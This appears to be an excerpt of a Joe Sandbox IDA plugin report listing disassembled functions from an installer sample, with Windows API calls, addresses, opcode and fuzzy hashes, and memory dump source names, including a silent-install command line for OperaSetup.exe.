                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3808545654-0
                                                                                                                                                                            • Opcode ID: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                                                            • Instruction ID: 75d1d1a794b0a88cdf1cba10915d0c929158808af8533b27f0e618500a238d04
                                                                                                                                                                            • Opcode Fuzzy Hash: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C01D475900260FFEB005BB5AD0DBDD7FB0AB29300F50C83AF542B61E2CAB904448B2D
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                            • String ID: !
                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                            • Opcode ID: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                                                            • Instruction ID: 9c099894a08b5387b140c0c6ceeae01ce9e162d44e3ef65fd99a7f94bc085c8a
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                                                            • Instruction Fuzzy Hash: 00219E71D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B889418B98
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004056CA
                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                                                                                                                                              • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                            • Opcode ID: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                                                            • Instruction ID: 4a72d77d5ba7db911775b8fd6e8698557fa8fe3088d7b3c11d294ca78c68b4d0
                                                                                                                                                                            • Opcode Fuzzy Hash: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                                                            • Instruction Fuzzy Hash: 6801B131100708EFDB204F90DDC0A9B3665FB80750F504036F605761D1D77A8C91EE2D
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,0043A728,?,00004000,00000000,?,0043A728,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,00000000,004067E1,80000002), ref: 004065B6
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004065C1
                                                                                                                                                                            Strings
                                                                                                                                                                            • "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0, xrefs: 00406577
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                                                            • API String ID: 3356406503-3663954162
                                                                                                                                                                            • Opcode ID: 4117ffae9e6ae2217b5f66a14d7ba68cab57efcdd57ed39205f80f17492d778b
                                                                                                                                                                            • Instruction ID: 7e3264d492d8171c025e68cf2784a3a6e2d975f6d7be64ef5dd4a0d5c385ab57
                                                                                                                                                                            • Opcode Fuzzy Hash: 4117ffae9e6ae2217b5f66a14d7ba68cab57efcdd57ed39205f80f17492d778b
                                                                                                                                                                            • Instruction Fuzzy Hash: E1017C72500209BBDF218F55DC09EDB3BA8EF54364F01403AFE16A2190E378DA64DBA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                            • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                                                            • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                                                                                                                                            • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                                                            • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99